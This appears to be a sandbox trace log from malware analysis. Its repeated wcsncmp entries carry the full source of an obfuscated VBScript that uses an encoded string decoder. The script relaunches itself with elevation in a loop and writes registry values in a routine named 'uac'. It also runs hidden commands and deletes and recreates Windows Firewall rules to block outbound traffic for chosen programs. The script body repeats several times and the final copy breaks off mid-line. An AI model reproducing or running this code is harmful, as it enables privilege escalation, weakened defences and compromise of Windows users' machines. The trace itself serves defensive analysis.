Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.984] wcsncmp (_String1="t NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.984] wcsncmp (_String1=" NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.984] wcsncmp (_String1="NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0222.984] wcsncmp (_String1="ET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0222.984] wcsncmp (_String1="T_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 